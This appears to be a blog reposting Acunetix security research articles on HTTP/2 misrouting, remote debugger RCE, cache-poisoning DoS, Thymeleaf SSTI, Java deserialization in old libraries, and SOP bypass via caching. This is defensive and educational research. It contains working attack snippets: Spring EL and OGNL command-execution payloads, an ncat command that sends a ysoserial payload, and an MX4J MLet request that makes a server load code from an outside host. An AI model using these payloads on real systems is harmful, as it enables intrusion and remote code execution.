четверг, 9 декабря 2021 г.

How Acunetix addresses HTTP/2 vulnerabilities

  (It's a repost from https://www.acunetix.com/blog/web-security-zone/how-acunetix-addresses-http-2-vulnerabilities/)  

In the latest release of Acunetix, we added support for the HTTP/2 protocol and introduced several checks specific to the vulnerabilities associated with this protocol. For example, we introduced checks for misrouting, server-side request forgery (SSRF), and web cache poisoning. In this article, we’d like to explain how these vulnerabilities happen so that you can understand the logic behind the checks.

An introduction to HTTP/2

To understand HTTP/2, it’s best to compare it with its predecessor, HTTP/1.x.

How HTTP/1.x works

HTTP/1.x is a text-based protocol. An HTTP request consists of headers and possibly a body. To separate headers between themselves as well as headers from the body, you use the character sequence \r\n (CRLF).

The first header is the request line, which consists of a method, a path, and a protocol version. To separate these elements, you usually use whitespaces. Other headers are name and value pairs separated by a colon (:). The only header that is required is Host.

The path may be represented in different ways. Usually, it is relative and it begins with a slash such as /path/here, but it may also be an absolute URI such as http://virtualhost2.com/path/here. Moreover, the hostname from the path takes precedence over the value of the Host header.

GET /path/here HTTP/1.1
Host: virtualhost.com
Other-header: value

When the web server receives an HTTP/1.x request, it parses it using certain characters as separators. However, due to the fact that HTTP is an old protocol and there are many different RFCs dedicated to it, different web servers parse requests differently and have different restrictions regarding the values ​​of certain elements.

How HTTP/2 works

HTTP/2, on the other hand, is a binary protocol with a completely different internal organization. To understand its vulnerabilities, you must know how the main elements of the HTTP/1.x protocol are now represented.

HTTP/2 got rid of the request line and now all the data is presented in the form of headers. Moreover, since the protocol is binary, each header is a field consisting of length and data. There is no longer a need to parse data on the basis of special characters.

HTTP/2 has four required headers called pseudo-headers. These are :method, :path, :scheme, and :authority. Note that pseudo-header common names start with a colon, but these names are not transmitted – instead, HTTP/2 uses special identifiers for each.

  • :method and :path are straight analogs of the method and path in HTTP/1.1.
  • :scheme is a new header that indicates which protocol is used, usually http or https.
  • :authority is a replacement for the Host header. You are allowed to send the usual Host header in the request but :authority has a higher priority.

Misrouting and SSRF

Today’s web applications are often multi-layered. They often use HTTP/2 to interact with user browsers and HTTP/1.1 to access backend servers via an HTTP/2 reverse proxy. As a result, the reverse proxy must convert the values ​​received from HTTP/2 to HTTP/1.1, which extends the attack surface. In addition, when implementing HTTP/2 support in a web server, developers may be less strict about the values ​​in various headers.

Envoy Proxy

For example, when I was doing research for the talk “Weird proxies/2 and a bit of magic” at ZeroNights 2021, I found that the Envoy Proxy (tested on version 1.18.3) allows you to use arbitrary values ​​in :method, including a variety of special characters, whitespace, and tab characters. This makes misrouting attacks possible.

Let’s say that you specify :method to be GET http://virtualhost2.com/any/path? and :path to be /. Envoy sees a valid path / and routes to the backend. However, when Envoy creates a backend request in the HTTP/1.x protocol format, it simply puts the value from :method into the request line. Thus, the request will be:

GET http://virtualhost2.com/any/path? / HTTP/1.1
Host: virtualhost.com

Depending on the type of backend web server, it can accept or reject such a request (because of the extra space). In the case of nginx, for example, this will be a valid request with the path /any/path? /. Moreover, we can reach an arbitrary virtual host (in the example, virtualhost2.com), to which we otherwise would not have access.

On the other hand, the Gunicorn web server allows arbitrary values ​​in the protocol version in the request line. Therefore, to achieve the same result as with nginx, we set :method to GET http://virtualhost2.com/any/path HTTP/1.1. After Envoy processes the request, it will look like this:

GET http://virtualhost2.com/any/path? / HTTP/1.1 / HTTP/1.1

Haproxy

A similar problem exists in Haproxy (tested on version 2.4.0). This reverse proxy allows arbitrary values ​​in the :scheme header. If the value is not http or https, Haproxy puts this value in the request line of the request sent to the backend server. If you set :scheme to test, the request to the web server will look like this:

GET test://virtualhost.com/ HTTP/1.1
Host: virtualhost.com

We can achieve a similar result as for Envoy by simply setting :scheme to http://virtualhost2.com/any/path?. The final request line to the backend will be:

GET http://virtualhost2.com/any/path?://virtualhost.com HTTP/1.1

This trick can be used both to access arbitrary virtual hosts on the backend (host misrouting) and to bypass various access restrictions on the reverse proxy, as well as to carry out SSRF attacks on the backend server. If the backend has an insecure configuration, it may send a request to an arbitrary host specified in the path from the request line.

The latest release of Acunetix has checks that discover such SSRF vulnerabilities.

Cache poisoning

Another common vulnerability of tools that use the HTTP/2 protocol is cache poisoning. In a typical scenario, a caching server is located in front of a web server and caches responses from the web server. To know which responses are cached, the caching server uses a key. A typical key is method + host + path + query.

As you can see, there are no headers in the key. Therefore, if a web application returns a header in a response, especially in an unsafe way, an attacker can send a request with an XSS payload in this header. The web application will then return it in the response, and the cache server will cache the response and return it to other users who requests the same path (key).

HTTP/2 adds new flavors to this attack. They are associated with the :scheme header, which may not be included in the key of a cache server, but through which we can influence the request from the cache server to a backend server as in the misrouting examples.

The attack may also take advantage of :authority and Host headers. Both are used to indicate the hostname but the cache server may handle them incorrectly and, for example, use the Host header in the cache key, but forward the request to the backend using the value of the :authority header. In such case, :authority will be an unkeyed header and an attacker can put a payload for cache poisoning attack in it.

Cache poisoning DoS

There is also a variation of the cache poisoning attack called the cache poisoning DoS. This happens when a cache server is configured to cache error-related responses (with a response status 400, for example). An attacker can send a specifically crafted request which is valid for the cache proxy but invalid for the backend server. It’s possible because servers parse requests differently and have different restrictions.

HTTP/2 offers us a fairly universal method for this attack. In HTTP/2, to improve performance, each cookie is supposed to be sent in a separate cookie header. In HTTP/1.1, you can only have one Cookie header in the request. Therefore, the cache server, having received a request with several cookie headers, has to concatenate them into one using ; as a separator.

Most servers have a limit on the length of a single header. A typical value is 8196. Therefore, if an attacker can send HTTP/2 request with two cookie headers with a length of 5000, they do not exceed the length and will be processed by a cache server. But the cache server concatenates them into one Cookie header, so the length of the Cookie header for the backend is 10000, which is above the limit. As a result, the backend returns a 400 error. The cache server caches it and we have a cache poisoning DoS.

The latest release of Acunetix includes checks for both web cache poisoning and CPDoS via HTTP/2.

More HTTP/2 in the future

The vulnerabilities listed above are the most common HTTP/2 vulnerabilities but there are more. We plan to add more checks in future scanner releases.

If this topic is of interest to you, I recommend looking at the following papers:

пятница, 23 апреля 2021 г.

Remote debuggers as an attack vector

 (It's a repost from https://www.acunetix.com/blog/web-security-zone/remote-debuggers-as-an-attack-vector/)  

Over the course of the past year, our team added many new checks to the Acunetix scanner. Several of these checks were related to the debug modes of web applications as well as components/panels used for debugging. These debug modes and components/panels often have misconfigurations, which may lead to the disclosure of sensitive information or even to remote command execution (code injection).

As I was working on these checks, I remembered cases when I discovered that applications expose a special port for remote debugging. When I was working as a penetration tester, I often found that enterprise Java applications exposed a Java Debug Wire Protocol (JDWP) port, which would easily allow an attacker to get full control over the application.

When I was writing the new Acunetix checks, I became curious about similar cases regarding other programming languages. I also checked what capabilities Nmap has in this respect and found only checks for JDWP. Therefore, I decided to research this blind spot further.

Low-hanging fruit

Every developer uses some kind of a debugging tool but remote debugging is less common. You use remote debugging when you cannot investigate an issue locally. For example, you use it when you need to debug an enterprise Java application that is too big to develop locally and that has strong connections with the environment or processed data. Another typical scenario for remote debugging is debugging a Docker container.

A debugger is a very valuable target for an attacker. The purpose of a debugger is to give the programmer maximum capabilities. It means that, in almost all cases, the attacker can very easily achieve remote code execution once they access the remote debugger.

Moreover, remote debugging usually happens in a trusted environment. Therefore, many debuggers don’t provide security features and use plain-text protocols without authentication or any kind of restrictions. On the other hand, some debuggers make the attack harder – they provide authentication or client IP restrictions. Some go even further and don’t open a port but instead initiate the connections to the IDE. There are also cases when the programmer passes a remote connection to the debugger through SSH.

Below you can find examples of RCE attacks on various debuggers. I tried to cover all common languages but focused on the most popular debuggers only and those that are most commonly misconfigured.

Attacks on debuggers

Java(JVM)/JPDA

JPDA is an architecture for debugging Java applications. It uses JDWP, which means that you can easily detect its port using Nmap. The port is, however, not always the same – it typically depends on the application server. For example, Tomcat uses 8000, ColdFusion uses 5005.
To gain access to a shell through a successful RCE attack, I used an exploit from Metasploit: exploit/multi/misc/java_jdwp_debugger.

Also note that all other JVM-based languages (Scala, Kotlin, etc.) also use JPDA, so this presents an attacker with a wide range of potential targets.

PHP/XDebug

XDebug is different from all other debuggers described in this article. It does not start its own server like all other debuggers. Instead, it connects back to the IDE. The IP and port of the IDE are stored in a configuration file.

Due to the nature of XDebug, you cannot detect it and attack it using a port scan. However, with a certain configuration of XDebug, you can attack it by sending a special parameter to the web application, which makes it connect to our IDE instead of the legitimate IDE.

Acunetix includes a check for such a vulnerable configuration. Details of this attack are available on this blog.

Python/pdb/remote_pdb

pdb is a common Python debugger and the remote_pdb package (and other similar packages) enables remote access to pdb. The default port is 4444. After you connect using ncat, you have full access to pdb and can execute arbitrary Python code.

Python/debugpy/ptvsd

debugpy is a common debugger for Python, provided by Microsoft. There is also a deprecated version of this debugger called ptvsd.

debugpy uses a debug protocol developed by Microsoft – DAP (Debug Adapter Protocol). This is a universal protocol that may also be used for debuggers for other languages. The protocol is similar to JSON messages with a preceding Content-Length header. The default port is 5678.

Microsoft uses this protocol in VSCode so the easiest way to communicate using this protocol is by using VSCode. If you have VSCode with an installed default Python extension, all you need to do is to open an arbitrary folder in VSCode, click the Run and Debug tab, click Create a launch.json file, choose PythonRemote Attach, and enter a target IP and port. VSCode will generate a launch.json file in the .vscode/ directory. Then click RunStart Debugging and when you connect, you can enter any Python code in the Debug console below, which will be executed on your target.

Ruby/ruby-debug-ide

The ruby-debug-ide (rdebug-ide) gem uses a custom but simple text protocol. This debugger typically uses the 1234 port.

To execute arbitrary code, you can use VSCode and follow the same steps as for Python. Note that if you want to disconnect from a remote debugger, VSCode sends quit instead of detach (like RubyMine would do), so VSCode stops the debugger completely.

Node.js/Debugger

Versions of Node.js earlier than v7 use the Node.js Debugger. This debugger uses the V8 Debugger protocol (which looks like HTTP headers with a JSON body). The default port is 5858.

The Node.js Debugger allows you to execute arbitrary JS code. All you need to do is use Metasploit with the exploit/multi/misc/nodejs_v8_debugger/ module.

Node.js/Inspector

Newer versions of Node.js use the Node.js Inspector. From the attacker’s point of view, the main difference is that the WebSocket transport protocol is now used and the default port is now 9229.

You can use several methods to interact with this debugger. Below you can see how to do it directly from Chrome, using chrome://inspect.

Golang/Delve

Delve is a debugger for Go. For remote debugging, Delve uses the JSON-RPC protocol, typically on port 2345. The protocol is quite complex, so you definitely need to use, at least, delve itself (dlv connect server:port).

Go is a compiled language and I was unable to find a direct way to achieve RCE as with other languages. Therefore, I recommend that you use a proper IDE (for example, Goland) because you will have to do some debugging yourself to be able to achieve RCE. Note that the source code is not necessary but it comes in handy.

Below is an example of connecting to Delve using Goland.

Delve provides a way to invoke functions imported to an application. However, this feature is still in beta testing and it doesn’t allow to pass static strings as function arguments.

The good news is that we can change the values of local variables and pass them to a function.  Therefore, we need to pause an application in a non-runtime thread within a scope that interests us. We can use standard libraries for that.

Below you can see how to pause an application on a standard HTTP library and invoke the os.Environ() function, which returns the env of the application (possibly containing sensitive data). If you want to execute arbitrary OS commands, you need to execute exec.Command(cmd,args).Run(). However, if so, you need to find and stop in a position with variables of type String and []String.

gdbserver

The gdbserver allows you to debug apps remotely with gdb. It has no security features. For communication, it uses a special plain-text protocol – the GDB Remote Serial Protocol (RSP).

The most convenient way to interact with this debugger is by using gdb itself: target extended-remote target.ip:port. Note that gdb provides very convenient commands remote get and remote put (for example, remote get remote_path local_path), which allow you to download/upload arbitrary files.

 

понедельник, 4 января 2021 г.

Cache poisoning denial-of-service attack techniques

 (It's a repost from https://www.acunetix.com/blog/web-security-zone/cache-poisoning-dos-attack-techniques/)  

Attacks related to cache poisoning represent a clearly visible web security trend that has emerged in recent years. The security community continues to research this area, finding new ways to attack.

As part of the recent release of Acunetix, we have added new checks related to cache poisoning vulnerabilities and we continue to work in this area to improve coverage. In this article, I’d like to share with you a few techniques related to one of the new checks – Cache Poisoning DoS (CPDoS).

What Is a Cache Poisoning Denial-of-Service Attack

In 2019, Hoai Viet Nguyen and Luigi Lo Iacono published a whitepaper related to CPDoS attacks. They explained various attack techniques and analyzed several content delivery networks and web servers that could be affected by such attacks.

CPDoS attacks are possible if there is an intermediate cache proxy server, located between the client (the user) and the web server (the back end), which is configured to cache responses with error-related status codes (e.g. 400 Bad Request). The attacker can manipulate HTTP requests and force the web server to reply with such an error status code for an existing resource (path). Then, the proxy server caches the error response, and all other users that request the same resource get the error response from the cache proxy instead of a valid response.

The whitepaper presents 3 attack types that allow the attacker to force a web application to return a 400 status code:

  • HTTP Header Oversize (HHO) – when the size of a header exceeds the maximum header length
  • HTTP Meta Character (HMC) – when the header of the attacker’s request contains a special “illegal” symbol
  • HTTP Method Override (HMO) – when the header of the attacker’s request changes the verb (method) to an unsupported one

New HHO Attack Tricks

While analyzing these attacks and working on my project dedicated to reverse proxies, I’ve managed to come up with a couple of tricks that can be used to perform an HHO attack.

Basically, an HHO attack is possible when the maximum header length is defined differently in the cache proxy and the web server. Different web servers, cache servers, and load balancers have different default limits. If the cache proxy has a maximum header limit that is higher than the limit defined in the web server, a request with a very long header can go through the cache server to the web server and cause the web server to return a 400 error (which will then be cached by the cache server).

For example, the default maximum header length for CloudFront is 20,480 bytes. On the other hand, the default maximum header length for the Apache web server is 8,192 bytes. Therefore, if an attacker sends a request with a header that is 10,000 bytes long and CloudFront cache proxy passes it to an Apache server, the Apache web server returns a 400 error.

However, an HHO attack is possible even if the cache server has the same header length limit as the web server or one that is a little lower. There are two reasons for this:

  • The web server maximum header length limit is a string length limit. The web servers that I have tested don’t perform any normalization and probably don’t even parse the header before applying the length check.
  • However, cache proxies send correct (normalized) headers to the back end.

 

Same-Limit HHO Attack Example

A practical HHO attack could be performed as follows:

  1. The attacker sends a request with a header that is 8192 bytes long (including \r\n) but with no space between the header name and the value. For example:
    header-name:abcdefgh(…)
    (8192 characters in total)
  2. The cache proxy checks the length of the header and finds that it is not more than 8192 characters long. Therefore, it parses the header and disregards the missing space.
  3. Then, the cache proxy prepares the correct version of the header to be sent to the web server:
    header-name: abcdefgh(…)
    (8193 characters in total)
  4. The cache proxy does not check that the final length of the header exceeds 8192 characters and sends the header to the web server.
  5. The web server that receives the header sees that it exceeds the limit by one byte, and therefore it returns the 400 error page.

Similar-Limit HHO Attack Example

If the cache proxy maximum header length limit is a bit lower than the web server limit, we cannot use the trick described above (1 byte is not enough). However, in such a case, we can misuse another feature.

Many proxy servers add headers to requests that are forwarded to the web server. For example, X-Forwarded-For, which contains the IP address of the user. However, if the original request also contains the X-Forwarded-For header, the proxy server often concatenates the original value with the value set by the proxy server (the user IP).

This allows us to perform the following attack:

  1. The attacker sends a request with the following header:
    X-Forwarded-For: abcdefgh(…)
    (8192 characters in total)
  2. The proxy concatenates this request with its own value:
    X-Forwarded-For: abcdefgh(…)12.34.56.78
    (8203 characters in total)
  3. The proxy sends the value to the web server, which replies with an error code because the header is too long.

Depending on the type of a proxy and its configuration such added headers may be different and the lengths of added values may be different as well. You can check some of them on my project page.

The Impact of CPDoS Attacks

When we were testing our new CPDoS script on bug bounty sites, we noticed that many sites are vulnerable to such attacks. However, in some cases, the impact of the attack is questionable. This is because quite a few cache proxies are configured to cache responses with error status codes only for a few seconds, which makes it difficult to exploit.

 

 

четверг, 23 июля 2020 г.

Exploiting SSTI in Thymeleaf

 (It's a repost from https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/ )

One of the most comfortable ways to build web pages is by using server-side templates. Such templates let you create HTML pages that include special elements that you can fill and modify dynamically. They are easy to understand for designers and easy to maintain for developers. There are many server-side template engines for different server-side languages and environments. One of them is Thymeleaf, which works with Java.

Server-side template injections (SSTI) are vulnerabilities that let the attacker inject code into such server-side templates. In simple terms, the attacker can introduce code that is actually processed by the server-side template. This may result in remote code execution (RCE), which is a very serious vulnerability. In many cases, such RCE happens in a sandbox environment provided by the template engine, but many times it is possible to escape this sandbox, which may let the attacker even take full control of the web server.

SSTI was initially researched by James Kettle and later by Emilio Pinna. However, neither of these authors included Thymeleaf in their SSTI research. Let’s see what RCE opportunities exist in this template engine.

Introduction to Thymeleaf

Thymeleaf is a modern server-side template engine for Java, based on XML/XHTML/HTML5 syntax. One of the core advantages of this engine is natural templating. This means that a Thymeleaf HTML template looks and works just like HTML. This is achieved mostly by using additional attributes in HTML tags. Here is an official example:

<table>
  <thead>
    <tr>
      <th th:text="#{msgs.headers.name}">Name</th>
      <th th:text="#{msgs.headers.price}">Price</th>
    </tr>
  </thead>
  <tbody>
    <tr th:each="prod: ${allProducts}">
      <td th:text="${prod.name}">Oranges</td>
      <td th:text="${#numbers.formatDecimal(prod.price, 1, 2)}">0.99</td>
    </tr>
  </tbody>
</table>
 

If you open a page with this code using a browser, you will see a filled table and all Thymeleaf-specific attributes will simply be skipped. However, when Thymeleaf processes this template, it replaces tag text with values passed to the template.

Hacking Thymeleaf

To attempt an SSTI in Thymeleaf, we first must understand expressions that appear in Thymeleaf attributes. Thymeleaf expressions can have the following types:

  • ${...}: Variable expressions – in practice, these are OGNL or Spring EL expressions.
  • *{...}: Selection expressions – similar to variable expressions but used for specific purposes.
  • #{...}: Message (i18n) expressions – used for internationalization.
  • @{...}: Link (URL) expressions – used to set correct URLs/paths in the application.
  • ~{...}: Fragment expressions – they let you reuse parts of templates.

The most important expression type for an attempted SSTI is the first one: variable expressions. If the web application is based on Spring, Thymeleaf uses Spring EL. If not, Thymeleaf uses OGNL.

The typical test expression for SSTI is ${7*7}. This expression works in Thymeleaf, too. If you want to achieve remote code execution, you can use one of the following test expressions:

  • SpringEL: ${T(java.lang.Runtime).getRuntime().exec('calc')}
  • OGNL: ${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}

However, as we mentioned before, expressions only work in special Thymeleaf attributes. If it’s necessary to use an expression in a different location in the template, Thymeleaf supports expression inlining. To use this feature, you must put an expression within [[...]] or [(...)] (select one or the other depending on whether you need to escape special symbols). Therefore, a simple SSTI detection payload for Thymeleaf would be [[${7*7}]].

Chances that the above detection payload would work are, however, very low. SSTI vulnerabilities usually happen when a template is dynamically generated in the code. Thymeleaf, by default, doesn’t allow such dynamically generated templates and all templates must be created earlier. Therefore, if a developer wants to create a template from a string on the fly, they would need to create their own TemplateResolver. This is possible but happens very rarely.

A Dangerous Feature

If we take a deeper look into the documentation of the Thymeleaf template engine, we will find an interesting feature called expression preprocessing. Expressions placed between double underscores (__...__) are preprocessed and the result of the preprocessing is used as part of the expression during regular processing. Here is an official example from Thymeleaf documentation:

#{selection.__${sel.code}__}

Thymelead first preprocesses ${sel.code}. Then, it uses the result (in this example it is a stored value ALL) as part of a real expression evaluated later (#{selection.ALL}).

This feature introduces a major potential for an SSTI vulnerability. If the attacker can control the content of the preprocessed value, they can execute an arbitrary expression. More precisely, it is a double-evaluation vulnerability, but this is hard to recognize using a black-box approach.

A Real-World Example of SSTI in Thymeleaf

PetClinic is an official demo application based on the Spring framework. It uses Thymeleaf as a template engine.

Most templates in this application reuse parts of the layout.html template, which includes a navigation bar. It has a special fragment (function), which generates the menu.

<li th:fragment="menuItem (path,active,title,glyph,text)" class="active" th:class="${active==menu ? 'active' : ''}">
      <a th:href="@{__${path}__}" th:title="${title}">

As you can see, the application preprocesses ${path}, which is then is used to set a correct link (@{}). However, this value comes from other parts of the template:

<li th:replace="::menuItem ('/owners/find','owners','find owners','search','Find owners')">

Unfortunately, all the parameters are static and uncontrollable by the attacker.

However, if we try to access a route that does not exist, the application returns the error.html template, which also reuses this part of layout.html. In the case of an exception (and accessing a route that does not exist is an exception), Spring automatically adds variables to the current context (model attributes). One of these variables is path (others include timestamp, trace, message, and more).

The path variable is a path part (with no URL-decoding) of the URL of the current request. More importantly, this path is used inside the menuItem fragment. Therefore, __${path}__ preprocesses the path from the request. And the attacker can control this path to achieve SSTI, and as a result of it, RCE.

As a simple test, we can send a request to http://petclinic/(7*7) and get 49 as the response.

However, despite this effect, we couldn’t find a way to achieve RCE in this situation when the application runs on Tomcat. This is because you need to use Spring EL, so you need to use ${}. However, Tomcat does not allow { and } characters in the path without URL-encoding. And we cannot use encoding, because ${path} returns the path without decoding. To prove these assumptions, we ran PetClinic on Jetty instead of Tomcat and achieved RCE because Jetty does not limit the use of { and } characters in the path:

http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})

We had to use ( and ) characters because after preprocessing the @{} expression receives a string starting with / (for example, /${7*7}), so the expression is not treated as an expression. The @{} expression allows you to add parameters to the URL by putting them in parentheses. We can misuse this feature to clear the context and get our expression executed.

Conclusion

Server-side template injection is much more of an issue than it appears to be because server-side templates are used more and more often. There are a lot of such template engines, and a lot of them remain unexploited yet but may introduce SSTI vulnerabilities if misused. There is a long way from ${7*7} to achieving RCE but in many cases, as you can see, it is possible.

As security researchers, we always find it interesting to see how complex technologies clash and affect each other and how much still remains unexplored.

 

четверг, 27 февраля 2020 г.

The curse of old Java libraries

(It's a repost from https://www.acunetix.com/blog/web-security-zone/old-java-libraries/

Java is known for its backward-compatibility. You can still execute code that was written many years ago, as long as you use an appropriate version of Java. Thanks to this feature, modern projects use a wide range of libraries that have been “tested by time” in production. However, such libraries are often left unsupported by maintainers for a long time. As a result, when you discover a vulnerability in a library, you may find it very hard to report the issue and to warn the developers who use that library.

Here are a few examples of such problems related to old libraries, which I recently came across when exploiting vulnerabilities as part of various bug bounty programs.

JMX and JMXMP

JMX (Java Management Extensions) is a well-known and widely-used technology for monitoring and managing Java applications. Since the Java deserialization “apocalypse”, it is perceived as quite notorious for security specialists. JMX uses the RMI protocol for transport purposes, which makes it inherently vulnerable to Java deserialization attacks. However, Oracle introduced the specification JEP-290 (JDK ≥ 8u121, ≥ 7u131, ≥ 6u141), which made such attacks much harder.

It turns out that according to the JMX specification (JSR-160), JMX also supports other transport protocols (called connectors), including the JMX Messaging Protocol (JMXMP) – a protocol specially created for JMX. However, this protocol was not included in Java SE and so it never became popular. One of the main advantages of JMXMP in comparison to RMI is the fact that JMXMP requires only one TCP port (RMI uses one static port for the RMI registry and another dynamically chosen port for actual interaction with a client). This fact makes JMXMP much more convenient when you need to restrict access using a firewall or when you want to set up port forwarding.

Despite the fact that libraries implementing JMXMP (jmxremote_optional.jar, opendmk_jmxremote_optional_jar-1.0-b01-ea.jar) have not been updated for at least ten years, JMXMP is still alive and used from time to time. For example, JMXMP is used in the Kubernetes environment and support for JMXMP has recently been added to Elassandra.

The problem with JMXMP is that this protocol completely relies on Java serialization for data transfer. At the same time, Oracle patches for JMX/RMI vulnerabilities don’t cover JMXMP, which makes it open to the Java deserialization attack. To exploit this vulnerability, you don’t even need to understand the protocol or the format of the data, just send a serialized payload from ysoserial directly to a JMXMP port:

ncat target.server.com 11099 < test.jser

If you cannot exploit this Java deserialization vulnerability (due to the lack of gadgets in the application classpath), you still can use other methods like uploading your MBean or misusing existing MBean methods. In order to connect to such JMX, you need to download the necessary package, add it to the classpath, and use the following format to specify the JMX endpoint: service:jmx:jmxmp://target.server.com:port/.

For example:

jconsole -J-Djava.class.path="%JAVA_HOME%/lib/jconsole.jar";"%JAVA_HOME%/lib/opendmk_jmxremote_optional_jar-1.0-b01-ea.jar" service:jmx:jmxmp://target.server.com:port/

You can also use MJET but it requires similar changes to the code.

MX4J

MX4J is an open-source implementation of JMX. It also provides an HTTP adapter that exposes JMX through HTTP (it works as a servlet). The problem with MX4J is that by default it doesn’t provide authentication. To exploit it, we can deploy a custom MBean using MLet (upload and execute the code). To upload the payload, you can use MJET. To force MX4J to get the MBean, you need to send a GET request to:

/invoke?objectname=DefaultDomain:type=MLet&operation=getMBeansFromURL&type0=java.lang.String&value0=http://yourserver/with/mlet

MX4J has not been updated for 15 years, but it is used by such software as Cassandra (in a non-default configuration). Your “homework” now is to look deeper into it and search for vulnerabilities. Note the use of hessian and burlap protocols as JMX-connectors, which are also vulnerable to deserialization attacks in a default configuration.

VJDBC

Virtual JDBC is an old library that provides access to a database using JDBC via other protocols (HTTP, RMI). In the case of HTTP, it provides a servlet, which you can use to send a special HTTP request that includes an SQL query and receive a result from a DB used by the web application. Unfortunately, VJDBC also uses Java serialization (via HTTP) to interact with the servlet.

If you use Google to search for this term, you will find that almost every search result is related to SAP Hybris. SAP Hybris is a major eCommerce/CRM platform used by many large enterprises. By default, SAP Hybris exposes the vjdbc-servlet that is vulnerable to an RCE caused by Java deserialization – CVE-2019-0344 (and which had other serious security issues in the past as well). A test for this vulnerability was added to Acunetix in September 2019. Unfortunately, it looks like SAP fixed only their internal version of VJDBC, and therefore all other software that depends on this library is vulnerable and its creators are probably unaware of the problem.

No Way Out

I was unable to report vulnerabilities in these libraries. For example, in the case of JMXMP, Oracle doesn’t support JDMK anymore at all. The only thing I could do is send reports directly to big projects that use these vulnerable libraries. I also wanted to use this article to increase awareness so please share it if you believe any of your colleagues might be using these libraries.

If you still rely on these libraries, try to find a safe alternative. If it’s impossible, restrict access to them and/or use process-level filters described in JEP-290 to protect against deserialization and/or put the application in a sandbox. Also, since these are open-source libraries, you can patch them manually.

Also, whenever you’re planning to use a package/library, make sure that it’s still supported and that there are still maintainers. In all the above cases, if maintainers still supported these projects, they could easily find and fix such vulnerabilities.

It would also be great if in the future Java and other languages would get a centralized method for reporting vulnerabilities in public packages/libraries, similar to the excellent central reporting system for Node.js.

вторник, 30 апреля 2019 г.

Bypassing SOP Using the Browser Cache

(It's a repost from https://www.acunetix.com/blog/web-security-zone/bypassing-sop-using-the-browser-cache/)

Misconfigured caching can lead to various vulnerabilities. For example, attackers may use badly-configured intermediate servers (reverse proxies, load balancers, or cache proxies) to gain access to sensitive data. Another way to exploit caching is through Web Cache Poisoning attacks.

The browser cache may look like a very safe place to temporarily store private information. The primary risk is that an attacker may gain access to it through the file system, which is usually considered a low-hazard vulnerability. However, in some cases, misconfigured cache-related headers may cause more serious security issues.

Cross-Domain Interaction Risks

Some websites have several subdomains and need to share data between them. This is normally not possible due to the same-origin policy (SOP). There are some methods that enable such cross-domain interaction, for example, JSONP (JSON with Padding). Developers who use such methods must implement some kind of protection against data leaking to other sites.

Let’s say that an example site has two subdomains: blog.example.com and account.example.com. The account.example.com site has a JSONP endpoint that returns sensitive user data on the basis of the user cookie. To prevent leaks, this endpoint verifies the Referer header against a whitelist that includes blog.example.com.

With this setup, if the user is lured to visit a malicious site, the attacker cannot directly steal sensitive data. However, if the JSONP endpoint sets cache-related headers, the attacker may be able to access private information from the browser cache.

Browser Behavior

Browsers have slightly different cache implementations but certain aspects are similar. First of all, only GET responses may be cached. When the browser gets the response to its GET request, it checks response headers for caching information:
  • If the response contains a Cache-Control: private or Cache-Control: public header, the response is cached for Cache-Control: max-age=<seconds>.
  • If the response contains an Expires header, the response is cached according to its value (this header has less priority than Cache-Control)
  • If none of these headers is present, some browsers may check the Last-Modified header and typically cache the response for ten percent of the difference between the current date and the Last-Modified date.
  • If there are no cache-related headers at all, the browser may cache the response but usually revalidates it before using it.
Problems may arise due to the fact that there is just one browser cache for all websites and it uses only one key to identify data: a normalized absolute URI (scheme://host:port/path?query). It means that the browser cache has no additional information about the request that initiated a particular response (for example, the site/origin from which it came, the JavaScript function or tag that initiated it, the associated cookies or headers, etc.). Any site gets the cached response from account.example.com as long as it initiates a GET request to the same URI.

The Anatomy of the Attack

The following is a step-by-step explanation of how this vulnerability is used for an attack:
  1. The user visits blog.example.com.
  2. A script on blog.example.com needs user account information.
  3. The user’s browser sends a request to the JSONP endpoint at account.example.com.
  4. The response from the JSONP endpoint at account.example.com contains cache-related headers.
  5. The user’s browser caches the response content.
  6. The user is lured to a malicious site
  7. The malicious site contains a script that points to the JSONP endpoint at account.example.com.
  8. The browser returns the cached response to the script at the malicious site.
In this situation, the Referer header is never checked because the response comes from the cache. Therefore, the attacker gains access to cached private information.



Similar Vulnerabilities

The same approach may be used to exploit other variations of Cross-Site Script Inclusion (XSSI) and other SOP Bypass attacks. Such attacks may bypass other server-side checks, for example, the Origin header, the SameSite cookie attribute, or custom headers.

Let us assume that account.example.com uses Cross-Origin Resource Sharing (CORS) instead of the JSONP endpoint. It returns an Access-Control-Allow-Origin: * header but uses a special token from a custom header to authenticate the user and protect sensitive data.

If responses are cached, the attacker may steal private information by making a request to the same URI. There is no CORS protection (due to Access-Control-Allow-Origin: *) and the user’s browser will return cached data without checking for the custom header token.
You can see how these vulnerabilities work in practice by analyzing the outputs of the browser console at a dedicated test site.

How To Protect Against SOP Bypass

The described SOP bypass vulnerability is caused by misconfiguration. In the case of cross-origin interactions, you should disable the browser cache. Most frameworks and ready-made scripts either don’t set cache-related headers or set them correctly by default (Cache-Control: no-store). However, you should always double check these headers to be secure.

Browser vendors are now considering or implementing a stricter approach to caching. Hopefully, this change will prevent such cross-origin leaks.

The tricks invented for the purposes of this article were inspired by the HTTP Cache Cross-Site Leaks article by Eduardo Vela.

вторник, 22 января 2019 г.

A Fresh Look On Reverse Proxy Related Attacks


In recent years, several researches have been published about attacks deliberately or directly related to reverse proxies. While implementing various reverse-proxy checks on the scanner, I started analyzing implementations of reverse proxies.

Initially, I wanted to analyze how both reverse proxies and web servers parse requests, find out inconsistencies in the process between them and use this knowledge for some kind of bypasses. Unfortunately, I was stuck with analyzing web servers and application servers due to too many possible variations. For example, Apache web server behaves differently depending on how you connect it with PHP. Also, an implementation of a web application, framework or middleware used by a web application can influence the requests parsing process as well. In the end I realized that some attacks are still little-known or completely unknown.

The goal of this research is to portray the bigger picture of potential attacks on a reverse proxy or the backend servers behind it. In the main part of the article, I will show some examples of vulnerable configurations and exploitation of attacks on various reverse proxies, but the second goal of the research is to share the raw data about various implementations of reverse proxies so you can find your ways/tricks (depending on a backend server in each specific situation).

Terms

Actually, the research is not only about reverse proxies, but also about load balancers, cache proxies, WAFs and other intermediate servers between a user and web application which parses and forwards requests. However I haven’t found a good term which correctly describes such a server and is well-known in the community, so I will use “reverse proxy” even when I talk about load balancers or cache proxy. I will call a web application behind a reverse proxy a back-end server. Be aware that a backend server is so-called an origin server (this will make sense when we start talking about caching).

 

What is reverse proxy?

 

How proxies work

